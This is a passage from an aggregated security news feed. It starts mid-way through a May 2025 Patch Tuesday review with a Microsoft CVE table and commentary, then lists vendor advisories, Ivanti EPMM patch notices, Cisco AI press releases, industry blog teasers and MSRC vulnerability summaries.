RCE CVE-2025-29827 Azure Automation Elevation of Privilege Vulnerability Critical 9.9 No No EoP CVE-2025-29813 Azure DevOps Elevation of Privilege Vulnerability Critical 10 No No EoP CVE-2025-29972 Azure Storage Resource Provider Spoofing Vulnerability Critical 9.9 No No Spoofing CVE-2025-47732 Microsoft Dataverse Remote Code Execution Vulnerability Critical 8.7 No No RCE CVE-2025-33072 Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability Critical 8.1 No No Info CVE-2025-30377 Microsoft Office Remote Code Execution Vulnerability Critical 8.4 No No RCE CVE-2025-30386 Microsoft Office Remote Code Execution Vulnerability Critical 8.4 No No RCE CVE-2025-47733 Microsoft Power Apps Information Disclosure Vulnerability Critical 9.1 No No Info CVE-2025-29833 Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability Critical 7.1 No No RCE CVE-2025-29966 Remote Desktop Client Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2025-29967 Remote Desktop Client Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2025-26646 .NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability Important 8 No No Spoofing CVE-2025-29968 Active Directory Certificate Services (AD CS) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-30387 Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability Important 9.8 No No EoP CVE-2025-24063 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29973 † Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-29970 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29826 Microsoft Dataverse Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-26684 Microsoft Defender Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2025-29977 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29979 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30375 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30376 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30379 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30381 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30383 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30393 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-32704 Microsoft Excel Remote Code Execution Vulnerability Important 8.4 No No RCE CVE-2025-32705 Microsoft Outlook Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29975 Microsoft PC Manager Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29978 Microsoft PowerPoint Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29976 † Microsoft SharePoint Server Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-30378 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7 No No RCE CVE-2025-30382 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-30384 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.4 No No RCE CVE-2025-27488 Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2025-29969 MS-EVEN RPC Remote Code Execution Vulnerability Important 7.5 No No EoP CVE-2025-32707 NTFS Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29841 Universal Print Management Service Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-29842 UrlMon Security Feature Bypass Vulnerability Important 7.5 No No SFB CVE-2025-21264 Visual Studio Code Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2025-32703 Visual Studio Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-29971 Web Threat Defense (WTD.sys) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-30385 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29957 Windows Deployment Services Denial of Service Vulnerability Important 6.2 No No DoS CVE-2025-29838 Windows ExecutionContext Driver Elevation of Privilege Vulnerability Important 7.4 No No EoP CVE-2025-30388 Windows Graphics Component Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29955 Windows Hyper-V Denial of Service Vulnerability Important 6.2 No No DoS CVE-2025-29837 Windows Installer Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-29974 Windows Kernel Information Disclosure Vulnerability Important 5.7 No No Info CVE-2025-27468 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-29954 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-29840 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-29962 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-29963 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-29964 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-29839 Windows Multiple UNC Provider Driver Information Disclosure Vulnerability Important 4 No No Info CVE-2025-29835 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-26677 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-30394 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-29831 Windows Remote Desktop Services Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2025-29830 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29832 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29836 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29958 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29959 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29960 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29961 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-29956 Windows SMB Information Disclosure Vulnerability Important 5.4 No No Info CVE-2025-29829 Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-4096 * Chromium: CVE-2025-4096 Heap buffer overflow in HTML High N/A No No RCE CVE-2025-4050 * Chromium: CVE-2025-4050 Out of bounds memory access in DevTools Medium N/A No No Info CVE-2025-4051 * Chromium: CVE-2025-4051 Insufficient data validation in DevTools Medium N/A No No RCE CVE-2025-4372 * Chromium: CVE-2025-4372 Use after free in WebAudio Medium N/A No No RCE CVE-2025-4052 * Chromium: CVE-2025-4052 Inappropriate implementation in DevTools Low N/A No No RCE * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.† Indicates further administrative actions are required to fully address the vulnerability. Moving on to the Critical-rated patches, the two that jump out are the bug in Office that could lead to code execution. These types of bugs are usually open-and-own, but in this case the Preview Pane is listed as an attack vector. Unlike last month, there’s no user interaction required here, so simply receiving a specially crafted file in the Preview Pane would allow for code execution. There are some scary looking bugs in Azure, including a CVSS 10(!), but these bugs have already been mitigated by Microsoft, so there’s no further action to take. That’s also true of the Dataverse and Power Apps bugs. There’s a Critical-rated information disclosure bug in Nuance PowerScribe, which is an app for radiology reporting that could allow an attacker to gain PII. There are a couple of bugs in Remote Desktop Client, but they rely on a user connecting to a malicious RDP server. The bug in Virtual Machine Bus (VMBus) requires authentication.Turning our attention to the other code execution bugs, we see a plethora of Office-related bugs, including nine for Excel alone. Fortunately, these are only the open-and-own variety, and the Preview Pane is not an attack vector. Beyond that, there’s a command injection bug in Visual Studio. Microsoft notes this bug is publicly known, but not under active attack. There’s a bug in Remote Desktop Services that at first glance sounds scary. An unauthenticated user can gain code execution by sending specially crafted packets. However, exploitation requires the admin to stop or restart the service. The final code execution bugs getting fixes this month all impact SharePoint. There are three deserialization bugs getting fixed. SharePoint is a popular target in Pwn2Own. We’ll see if these fixes knocked out any entries.In addition to the two Critical-rated elevation of privilege (EoP) bugs already discussed, there are 16 others in this release. The majority of these simply either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. There are some notable exceptions. The bug in Document Intelligence Studio On-Prem clocks in at a CVSS 9.8 and allows an attacker to download the content of the parent folder of the mounted path. The bugs in Universal Print Management and Windows CLFS allow for a file deletion, which, as we’ve seen, could then be turned into a privilege escalation. Lastly, the bug in Azure File Sync will take some work to fully resolve. If you need to take extra actions, you should have been notified through Azure Service Health Alerts under TrackingID: 4K2C-9_Z. If you haven’t received this alert, you aren’t affected and don’t need to take action.There are two security feature bypass (SFB) patches in this month’s release. The first addresses a bug in URLMon that could allow an attacker to bypass the Office Protected View. This result in someone opening a file in editing mode rather than protected mode – a handy thing to have if you want to spread ransomware through phishing. The other SFB is in Visual Studio and could allow the bypass of the Trusted Domain ServiceLooking at the information disclosure bugs in the May release, there are a handful. However, all of them merely result in info leaks consisting of unspecified memory contents. This is useful info to have when exploiting components on a system, but otherwise not quite riveting. The May release include two fixes for spoofing bugs. The first is in Defender for Identity and could be reached by an adjacent attacker. Microsoft doesn’t specify what type of spoofing occurs, but given the name of the component, one would think an attacker could spoof someone’s identity. Microsoft also notes this bug was publicly disclosed prior to the patch release. The other spoofing bug is in .NET and Visual Studio. Authentication is required for this to be exploited, but it could allow a standard user to place a malicious file on a system then wait for the privileged victim to run the calling command.There are seven lucky Denial-of-Service (DoS) bugs getting patches this month. However, Microsoft provides no actionable information about these bugs. Instead, they simply state that an attacker could deny service over a network (or locally) to that component.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on June 10. Assuming I survive the next few days, I’ll be back with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

https://www.thezdi.com/blog/2025/5/13/the-may-2025-security-update-review
Impersonation Scheme Targeting Middle Eastern Students in the United States
2025-05-13T18:00:00Z | 1747159200

Impersonation Scheme Targeting Middle Eastern Students in the United States

https://www.ic3.gov/PSA/2025/PSA250513
What Are Indicators of Compromise? A 2025 Guide for Cybersecurity Teams
2025-05-13T18:00:00Z | 1747159200

For security teams, early detection is the difference between a minor incident and a full-scale breach. That’s where Indicators of Compromise (IOCs) come into play. These digital breadcrumbs—ranging from suspicious IP addresses to abnormal user behavior—serve as early warning signs of malicious activity within a system or network.   Understanding IOCs is essential for building a robust security posture, enabling organizations to not only detect threats... Read more » The post What Are Indicators of Compromise? A 2025 Guide for Cybersecurity Teams appeared first on Plixer.

https://www.plixer.com/blog/indicators-of-compromise-guide/
Network Security Policy Management (NSPM) in 2025
2025-05-13T17:52:51Z | 1747158771

The recent failure of Skybox has left many companies without a supported NSPM solution. As a result, many of these previous Skybox customers have taken this opportunity to reevaluate their...

https://www.firemon.com/blog/network-security-policy-management-nspm-in-2025/
Nine Awards. One Mission: Proactive, Resilient Cyber Defense
2025-05-13T16:30:58Z | 1747153858

At HYAS, we don’t chase awards. We chase positive client outcomes. But when outcomes are this big—and recognized at one of the industry's most important global events—we’ll take a moment to celebrate.

https://www.hyas.com/blog/nine-awards-one-mission-proactive-resilient-cyber-defense
The AI Fix #50: AI brings dead man back for killer’s trial, and the judge loves it
2025-05-13T15:40:04Z | 1747150804

In episode 50 of The AI Fix, AI brings a slain man back from the dead so he can appear at his killer's trial, Mark gets a mysterious phone call, Trump uses AI to become Pope Donald the First, Zuck ponders the nature of friendship, Apple says the quiet part out loud, xAI springs a leak, and a philosophy professor says "so long weather forecasters!" Graham explains why researchers in Oxford have made a digital twin of your grandmother, and Mark looks at the bizarre case of road rage victim Chris Pelkey. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

https://grahamcluley.com/the-ai-fix-50/
May Security Update
2025-05-13T15:02:59Z | 1747148579

Ivanti releases standard security patches on the second Tuesday of every month. For many of our customers, the predictable schedule facilitates better planning and management of IT resources, allowing them to allocate time and personnel efficiently for the timely updates. Today, Ivanti is disclosing vulnerabilities in Ivanti ITSM (on-premises only), Cloud Security Application (CSA) and Neurons for MDM. It is important for customers to know: We have no evidence of any of these vulnerabilities being exploited in the wild. These vulnerabilities do not impact any other Ivanti solutions. More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisories: Ivanti Neurons for ITSM (on-premises only) Cloud Security Application (CSA) Ivanti Neurons for MDM Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required). Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

https://www.ivanti.com/blog/may-2025-security-update
Sårbarheter i Ivanti EPMM
2025-05-13T14:50:00Z | 1747147800

Ivanti har publicerat säkerhetsuppdateringar för sårbarheter i Ivanti Endpoint Manager Mobile (EPMM), tidigare MobileIron. Enligt Ivanti så utnyttjas dessa sårbarheter aktivt, i begränsad omfattning. [1]

https://www.cert.se/2025/05/sarbarheter-i-ivanti-epmm.html
Cisco Announces New Strategic AI Initiatives in the Middle East
2025-05-13T14:15:00Z | 1747145700

These new initiatives place Cisco at the center of the AI revolution in the Gulf, providing world class and trusted technology together with other Cisco partners.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-announces-new-strategic-ai-initiatives-in-the-middle-east.html
G42 and Cisco to Extend Strategic Partnership to Drive AI Innovation and Infrastructure Development
2025-05-13T14:15:00Z | 1747145700

The MoU builds on G42’s growing ecosystem as it accelerates its efforts to scale AI infrastructure and innovationMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/g42-and-cisco-extend-strategic-partnership-to-drive-ai-innovation-and-infrastructure-development.html
Cisco Expands Partnership with Saudi Arabia to Power the AI Future
2025-05-13T14:15:00Z | 1747145700

Cisco to Join HUMAIN’s Initiative to Build the Kingdom’s Future AI InfrastructureMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-expands-partnership-with-saudi-arabia-to-power-the-ai-future.html
Cisco to Collaborate with AI Infrastructure Partnership to Drive Investment in Data Centers and Enabling Infrastructure
2025-05-13T14:15:00Z | 1747145700

Cisco to work with BlackRock, Global Infrastructure Partners, MGX, Microsoft, NVIDIA and xAI to accelerate innovation and scaling of AI data centersMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-to-collaborate-with-ai-infrastructure-partnership-to-drive-investment-in-data-centers-and-enabling-infrastructure.html
Cisco Announces New Strategic AI Initiatives in the Middle East
2025-05-13T14:15:00Z | 1747145700

These new initiatives place Cisco at the center of the AI revolution in the Gulf, providing world class and trusted technology together with other Cisco partners.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-announces-new-strategic-ai-initiatives-in-the-middle-east.html
EPMM Security Update
2025-05-13T14:05:45Z | 1747145145

At Ivanti, transparency is a cornerstone of our commitment to customer security and trust. It is through such transparency that vulnerabilities are swiftly addressed, allowing our customers and the broader ecosystem to take proactive measures to safeguard their environments amidst a rapidly evolving and highly sophisticated threat landscape. To this end, we are issuing an important security update addressing vulnerabilities associated with open-source libraries used in Ivanti Endpoint Manager Mobile (EPMM). We have provided an FAQ below and in the Security Advisory. At the time of disclosure, we are aware of a very limited number of customers whose solution has been exploited. The issue only affects the on-prem EPMM product. It is not present in Ivanti Neurons for MDM, Ivanti’s cloud-based unified endpoint management solution, Ivanti Sentry, or any other Ivanti products. We urge all customers using the on-prem EPMM product to promptly install the patch. We have made additional resources and support teams available to assist customers in implementing the patch and addressing any concerns. Detailed information is available in our Security Advisory so that customers can protect their environment. Thank you to our customers and security partners for their engagement and support, which enabled our swift response to this issue. We remain committed to continuously improving our products and processes through collaboration and transparency with our stakeholders and the broader security ecosystem. Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required). Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

https://www.ivanti.com/blog/epmm-security-update
What is Proactive Threat Hunting?
2025-05-13T14:02:42Z | 1747144962

In the modern threat landscape, reacting to cyber attacks AFTER they’ve occurred is simply not good enough. Waiting for alerts to drop, and chasing incidents, leaves critical gaps in an organization’s cyber defenses.  SOC and IR teams need to take a proactive approach to threat hunting, and focus on anticipating and neutralizing threats before they […] The post What is Proactive Threat Hunting?  appeared first on Silent Push.

https://www.silentpush.com/blog/what-is-proactive-threat-hunting/
Küberkiirendi aitab luua uusi küberturbe lahendusi – tule ja vii oma idee ellu!
2025-05-13T13:15:58Z | 1747142158

Riigi Infosüsteemi Amet (RIA) ja Tehnopol Startup Inkubaator kutsuvad Küberkiirendi uues voorus osalema küberturvalisuse valdkonna idufirmasid, kel on võimalik saada oma ideede arendamiseks nõu valdkonna parimatelt mentoritelt ja 60 000 eurot toetust.

https://ria.ee/uudised/kuberkiirendi-aitab-luua-uusi-kuberturbe-lahendusi-tule-ja-vii-oma-idee-ellu
Portnox Wins 2025 Enterprise Security Tech Cyber Top Companies Award
2025-05-13T13:00:04Z | 1747141204

AUSTIN, TX – May 13, 2025 – Portnox, a leading provider of cloud-native, zero trust access control solutions, today announced it has been named a 2025 Enterprise Security Tech Cyber Top Companies Award winner. The award, presented by Enterprise Security Tech, recognizes companies that have demonstrated exceptional value to the market through technical innovation, industry… The post Portnox Wins 2025 Enterprise Security Tech Cyber Top Companies Award appeared first on Portnox.

https://www.portnox.com/blog/press-releases/portnox-wins-2025-enterprise-security-tech-cyber-top-companies-award/
Advancing Cybersecurity in Australia
2025-05-13T13:00:02Z | 1747141202

Palo Alto Networks Prisma Access Browser Achieves IRAP Assessment Government organisations and critical infrastructure entities are the custodians of some of the most important and sensitive data in the world. This data … The post Advancing Cybersecurity in Australia appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/advancing-cybersecurity-in-australia/
Bridging the Gap: How a Controls-Focused Cybersecurity Program Aligns SEC Rules with Daily Operations
2025-05-13T13:00:00Z | 1747141200

With the U.S. Securities and Exchange Commission (SEC) strengthening cybersecurity disclosure rules, organizations face increasing pressure to not only protect […]

https://www.guidepointsecurity.com/blog/bridging-the-gap/
Two years’ jail for down-on-his-luck man who sold ransomware online
2025-05-13T12:38:17Z | 1747139897

A man has been jailed in Ireland for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/two-years-jail-for-down-on-his-luck-man-who-sold-ransomware-online
Timelines for migration to post-quantum cryptography
2025-05-13T12:36:49Z | 1747139809

Activities which organisations must carry out to migrate safely to post-quantum cryptography in the coming years.

https://www.ncsc.gov.uk/guidance/pqc-migration-timelines
Introducing AI-Driven Policy Management for Better Security
2025-05-13T12:26:00Z | 1747139160

Firewall policy management has reached a critical point, characterized by misconfigurations, overly complex rules, and ongoing audits. The burden continues to fall on already-stretched security teams. For CISOs, the question isn’t whether policies are being enforced; it’s whether they’re aligned, effective, and resilient across every location and environment. Considering this, Cato is excited to announce... The post Introducing AI-Driven Policy Management for Better Security  appeared first on Cato Networks.

https://www.catonetworks.com/blog/introducing-ai-driven-policy-management-for-better-security/
Microsoft u-turn gives apps security updates on Windows 10 until 2028
2025-05-13T12:07:33Z | 1747138053

Microsoft says the move is designed to help maintain security while people upgrade to Windows 11

https://www.itpro.com/security/microsoft-u-turn-gives-apps-security-updates-on-windows-10-until-2028
Cisco Appoints Kevin Weil to its Board of Directors
2025-05-13T12:00:00Z | 1747137600

Kevin Weil, Chief Product Officer at OpenAI, appointed to Cisco's Board of DirectorsMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-appoints-kevin-weil-to-its-board-of-directors.html
A DDoS Attack Just Breached Your Defenses ? Now What?
2025-05-13T12:00:00Z | 1747137600

https://www.akamai.com/blog/security/2025/may/ddos-attack-breached-your-defenses-now-what
M&S confirms customer personal data was stolen in recent attack
2025-05-13T11:33:53Z | 1747136033

The retailer confirmed hackers accessed customer data –but not payment information or passwords

https://www.itpro.com/security/cyber-attacks/m-and-s-customer-personal-data-stolen
Spain reconsiders possibility of hackers causing blackouts
2025-05-13T10:30:54Z | 1747132254

Spain sends questions to smaller power providers as investigation into outage continues

https://www.itpro.com/security/spain-reconsiders-possibility-of-hackers-causing-blackouts
Navigating a fractured landscape: Political turmoil in France and Germany
2025-05-13T10:04:48Z | 1747130688

Both France and Germany – two of the EU’s key economic and political powerhouses – have recently undergone a period of political turmoil. As in much of Europe, numerous factors including perceived excessive levels of illegal migration, economic slowdowns and insufficient investment in public services, have seen a notable shift in public allegiance from the centre to the right. This has resulted in a fractured political landscape in both countries in recent months, leading to political paralysis and considerable policy uncertainty for international investors. While it appears some semblance of stability is now being restored, obstacles do remain, as French Premier Francois Bayrou and newly elected German Chancellor Friedrich Merz seek to govern whilst under growing pressure to satisfy a wide range of ideologies on the left and right. In this piece, Tris Puri, assesses the prognosis for political stability in both countries, as well as the potential short and longer-term impact for domestic companies and international investors.

https://www.s-rminform.com/latest-thinking/navigating-a-fractured-landscape-political-turmoil-in-france-and-germany
Defining a new methodology for modeling and tracking compartmentalized threats
2025-05-13T10:00:41Z | 1747130441

How do you profile actors and defend your systems when multiple threat actors are working together? In Part 2, Cisco Talos proposes an extended Diamond Model to analyze complex relationships between attackers.

https://blog.talosintelligence.com/compartmentalized-threat-modeling/
Using a Mythic agent to optimize penetration testing
2025-05-13T10:00:41Z | 1747130441

Kaspersky experts discuss optimizing penetration testing with an agent for the Mythic framework and object files for Cobalt Strike.

https://securelist.com/agent-for-mythic-c2-with-beacon-object-files/115259/
Redefining IABs: Impacts of compartmentalization on threat tracking and modeling
2025-05-13T10:00:23Z | 1747130423

Threat actors are teaming up, splitting attacks into stages and making defense harder than ever. In Part 1, Cisco Talos examines their tactics and defines their motivations.

https://blog.talosintelligence.com/redefining-initial-access-brokers/
Introducing the Sophos MSP Elevate program
2025-05-13T09:53:31Z | 1747130011

Accelerating MSP business growth and elevating customers' defenses with differentiated cybersecurity products and services.

https://news.sophos.com/en-us/2025/05/13/introducing-the-sophos-msp-elevate-program/
India-Pakistan Conflicts Escalating: Military Operations and DDoS Attacks Making Targeted Strikes
2025-05-13T09:34:22Z | 1747128862

Background On May 7, 2025, NSFOCUS Fuying Lab released “Two-Front Confrontation: Parallel Narratives of India-Pakistan Reality Friction and Cyber DDoS Attacks“, which analyzed the DDoS attack activities in the early stage of India-Pakistan friction. This article is the second in this series, mainly analyzing the DDoS attack activities against India after May 7. May 7, […] The post India-Pakistan Conflicts Escalating: Military Operations and DDoS Attacks Making Targeted Strikes appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/india-pakistan-conflicts-escalating-military-operations-and-ddos-attacks-making-targeted-strikes/
Verint Master Class: Five Things You Need to Know as a Customer Experience Executive in 2025
2025-05-13T09:02:26Z | 1747126946

Verint Master Class: Learn how your customers prefer to interact with your organization and why your contact center and CX operations need agentic AI and LLMs. The post Verint Master Class: Five Things You Need to Know as a Customer Experience Executive in 2025 appeared first on Verint.

https://www.verint.com/resources/five-things-you-need-to-know-as-a-customer-experience-executive-in-2025/
CVE-2024-49128 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

To comprehensively address CVE-2024-49128, Microsoft has released May 2025 security updates for all affected versions of Windows Server. Microsoft recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49128
CVE-2017-0045 Windows DVD Maker XML External Entity Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Corrected CVE title. This is an informational change only.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0045
CVE-2025-29979 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29979
CVE-2025-24063 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24063
CVE-2025-32707 NTFS Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32707
CVE-2025-32705 Microsoft Outlook Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32705
CVE-2025-32704 Microsoft Excel Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32704
CVE-2025-32702 Visual Studio Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper neutralization of special elements used in a command ('command injection') in Visual Studio allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-32702
CVE-2025-30397 Scripting Engine Memory Corruption Vulnerability
2025-05-13T07:00:00Z | 1747119600

Access of resource using incompatible type ('type confusion') in Microsoft Scripting Engine allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397
CVE-2025-30388 Windows Graphics Component Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Win32K - GRFX allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30388
CVE-2025-30385 Windows Common Log File System Driver Elevation of Privilege Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30385
CVE-2025-29974 Windows Kernel Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Integer underflow (wrap or wraparound) in Windows Kernel allows an unauthorized attacker to disclose information over an adjacent network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29974
CVE-2025-29963 Windows Media Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29963
CVE-2025-29962 Windows Media Remote Code Execution Vulnerability
2025-05-13T07:00:00Z | 1747119600

Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29962
CVE-2025-29961 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29961
CVE-2025-29958 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29958
CVE-2025-29957 Windows Deployment Services Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Uncontrolled resource consumption in Windows Deployment Services allows an unauthorized attacker to deny service locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29957
CVE-2025-29956 Windows SMB Information Disclosure Vulnerability
2025-05-13T07:00:00Z | 1747119600

Buffer over-read in Windows SMB allows an authorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29956
CVE-2025-29955 Windows Hyper-V Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Improper input validation in Windows Hyper-V allows an unauthorized attacker to deny service locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29955
CVE-2025-29954 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
2025-05-13T07:00:00Z | 1747119600

Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29954
CVE-2025-29842 UrlMon Security Feature Bypass Vulnerability
2025-05-13T07:00:00Z | 1747119600

Acceptance of extraneous untrusted data with trusted data in UrlMon allows an unauthorized attacker to bypass a security feature over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29842
CVE-2025-29841 Universal Print Management Service Elevation of Privilege Vulnerability
